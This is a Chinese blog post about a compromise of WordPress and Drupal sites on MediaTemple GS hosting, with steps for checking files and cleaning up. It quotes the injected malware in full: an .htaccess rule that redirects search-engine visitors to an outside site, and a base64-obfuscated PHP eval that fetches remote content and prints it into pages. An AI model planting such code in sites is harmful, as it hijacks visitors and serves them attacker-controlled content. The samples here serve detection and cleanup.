从订阅的一些国外博客可以看到,部分存放在MediaTemple GS 主机上的 WordPress 和Drupal有被入侵的痕迹,只对 MediaTemple 的GS主机,其他的DV等主机都没问题。
1、查看有没有被入侵的痕迹 ¶
查看根目录下的PHP文件,.htaccess和robots.txt,根据国外一个Blogger的描述,被入侵的.htaccess文件会多下面的一段代码:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://allvideo.org.uk/in.cgi?4¶meter=sf [R,L]
根据 MediaTemple 的KB上描述,php文件上会多下面的一段代码:
<!--5edfgh345--><?php eval(base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?>
2、解决办法 ¶
打开PHP文件,.htaccess和robots.txt这几个文件,看看有没有可疑的代码,如果有,立即删除。并且更改FTP/SSH的密码。
update:MediaTemple在自己的博客上发表了几篇日志
3、总结 ¶
我在 MediaTemple 也有安装 WordPress ,但是比较少用,我刚刚登上去瞄了一下,发现没被入侵,这次入侵应该是针对部分的用户。如果你的 WordPress 或者 Drupal存放在 MediaTemple 上的话,最好去检查一下。
3条留言
留言